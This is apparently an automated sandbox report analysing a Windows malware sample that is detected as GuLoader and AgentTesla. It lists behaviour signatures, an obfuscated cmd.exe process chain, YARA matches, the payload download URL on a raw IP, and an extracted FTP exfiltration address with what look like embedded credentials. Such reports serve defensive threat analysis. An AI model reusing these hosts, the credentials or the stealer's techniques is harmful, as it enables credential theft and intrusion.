Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Gulvmaattens.exe

Overview

General Information

Sample Name:Gulvmaattens.exe
Analysis ID:680567
MD5:afa8d5c2f8f14ed458ea6d8547fe57a8
SHA1:ef603c82c7976fcd34a018cd8280e28b8a22510d
SHA256:7d3d134f8b37621766da3378b143ab0fbacf13f7793f42b6e81d7e5cc702a32b
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Antivirus detection for URL or domain
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Mass process execution to delay analysis
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Too many similar processes found
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
PE / OLE file has an invalid certificate
PE file contains more sections than normal
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • Gulvmaattens.exe (PID: 7948 cmdline: "C:\Users\user\Desktop\Gulvmaattens.exe" MD5: AFA8D5C2F8F14ED458EA6D8547FE57A8)
    • cmd.exe (PID: 3476 cmdline: cmd.exe /c set /a "0x78^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8124 cmdline: cmd.exe /c set /a "0x76^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5644 cmdline: cmd.exe /c set /a "0x61^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4584 cmdline: cmd.exe /c set /a "0x7D^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4144 cmdline: cmd.exe /c set /a "0x76^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4364 cmdline: cmd.exe /c set /a "0x7F^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 424 cmdline: cmd.exe /c set /a "0x00^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7492 cmdline: cmd.exe /c set /a "0x01^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7548 cmdline: cmd.exe /c set /a "0x09^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1528 cmdline: cmd.exe /c set /a "0x09^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2428 cmdline: cmd.exe /c set /a "0x70^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6768 cmdline: cmd.exe /c set /a "0x41^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7892 cmdline: cmd.exe /c set /a "0x56^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5572 cmdline: cmd.exe /c set /a "0x52^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4092 cmdline: cmd.exe /c set /a "0x47^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 392 cmdline: cmd.exe /c set /a "0x56^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7196 cmdline: cmd.exe /c set /a "0x75^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7664 cmdline: cmd.exe /c set /a "0x5A^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7456 cmdline: cmd.exe /c set /a "0x5F^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7532 cmdline: cmd.exe /c set /a "0x56^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5016 cmdline: cmd.exe /c set /a "0x72^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7308 cmdline: cmd.exe /c set /a "0x1B^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7392 cmdline: cmd.exe /c set /a "0x5E^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3476 cmdline: cmd.exe /c set /a "0x13^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1596 cmdline: cmd.exe /c set /a "0x41^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3452 cmdline: cmd.exe /c set /a "0x07^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1952 cmdline: cmd.exe /c set /a "0x13^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 404 cmdline: cmd.exe /c set /a "0x1F^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 384 cmdline: cmd.exe /c set /a "0x13^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7196 cmdline: cmd.exe /c set /a "0x5A^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7664 cmdline: cmd.exe /c set /a "0x13^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7456 cmdline: cmd.exe /c set /a "0x03^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7532 cmdline: cmd.exe /c set /a "0x4B^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5016 cmdline: cmd.exe /c set /a "0x0B^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7308 cmdline: cmd.exe /c set /a "0x03^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7392 cmdline: cmd.exe /c set /a "0x03^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3476 cmdline: cmd.exe /c set /a "0x03^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1596 cmdline: cmd.exe /c set /a "0x03^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3452 cmdline: cmd.exe /c set /a "0x03^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1952 cmdline: cmd.exe /c set /a "0x03^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 404 cmdline: cmd.exe /c set /a "0x03^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 384 cmdline: cmd.exe /c set /a "0x1F^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7196 cmdline: cmd.exe /c set /a "0x13^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7664 cmdline: cmd.exe /c set /a "0x5A^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7456 cmdline: cmd.exe /c set /a "0x13^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7532 cmdline: cmd.exe /c set /a "0x03^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5016 cmdline: cmd.exe /c set /a "0x1F^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7308 cmdline: cmd.exe /c set /a "0x13^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7392 cmdline: cmd.exe /c set /a "0x43^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3476 cmdline: cmd.exe /c set /a "0x13^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4144 cmdline: cmd.exe /c set /a "0x03^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1928 cmdline: cmd.exe /c set /a "0x1F^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6356 cmdline: cmd.exe /c set /a "0x13^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4032 cmdline: cmd.exe /c set /a "0x5A^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5528 cmdline: cmd.exe /c set /a "0x13^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7480 cmdline: cmd.exe /c set /a "0x07^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7492 cmdline: cmd.exe /c set /a "0x1F^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2052 cmdline: cmd.exe /c set /a "0x13^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7328 cmdline: cmd.exe /c set /a "0x5A^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6628 cmdline: cmd.exe /c set /a "0x13^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1384 cmdline: cmd.exe /c set /a "0x03^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6808 cmdline: cmd.exe /c set /a "0x4B^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4496 cmdline: cmd.exe /c set /a "0x0B^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 408 cmdline: cmd.exe /c set /a "0x03^51" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • CasPol.exe (PID: 5964 cmdline: "C:\Users\user\Desktop\Gulvmaattens.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 6752 cmdline: "C:\Users\user\Desktop\Gulvmaattens.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 3028 cmdline: "C:\Users\user\Desktop\Gulvmaattens.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 1840 cmdline: "C:\Users\user\Desktop\Gulvmaattens.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 3308 cmdline: "C:\Users\user\Desktop\Gulvmaattens.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
{"Exfil Mode": "FTP", "SMTP Info": "ftp://ftp.gettoner.com.mx/droid@gettoner.com.mxfedxunited543@"}
SourceRuleDescriptionAuthorStrings
0000008F.00000002.55933402701.000000001D021000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000008F.00000002.55933402701.000000001D021000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000008F.00000002.55933402701.000000001D021000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
      • 0x31148:$s10: logins
      • 0x46bcc:$s10: logins
      • 0x4ff40:$s11: credential
      • 0x1e1e:$m1: yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time
      • 0x2346:$m2: %image/jpg:Zone.Identifier\tmpG.tmp%urlkey%-f \Data\Tor\torrcp=%PostURL%127.0.0.1POST+%2B
      • 0x2892:$m3: >{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\WScript.ShellRegReadg401
      00000001.00000002.51584834701.0000000002AA0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        0000008F.00000000.51450296776.0000000000B00000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Click to see the 3 entries
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: http://212.192.246.226/jLIEsqMZom33.asdLAvira URL Cloud: Label: malware
          Source: ftp://ftp.gettoner.com.mx/droidAvira URL Cloud: Label: malware
          Source: http://212.192.246.226/jLIEsqMZom33.asdmAvira URL Cloud: Label: malware
          Source: http://212.192.246.226/jLIEsqMZom33.asdAvira URL Cloud: Label: malware
          Source: cmd.exe.8124.5.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "SMTP Info": "ftp://ftp.gettoner.com.mx/droid@gettoner.com.mxfedxunited543@"}
          Source: Gulvmaattens.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: Gulvmaattens.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: sqmapi.pdbUGP source: sqmapi.dll.1.dr
          Source: Binary string: sqmapi.pdb source: sqmapi.dll.1.dr
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_0040676F FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_00405B23 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\Gulvmaattens.exeCode function: 1_2_00402902 FindFirstFileW,
          Source: Joe Sandbox ViewIP Address: 212.192.246.226 212.192.246.226
          Source: global trafficHTTP traffic detected: GET /jLIEsqMZom33.asd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 212.192.246.226Cache-Control: no-cache
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.226
          Source: CasPol.exe, 0000008F.00000002.55933402701.000000001D021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ftp://ftp.gettoner.com.mx/droid
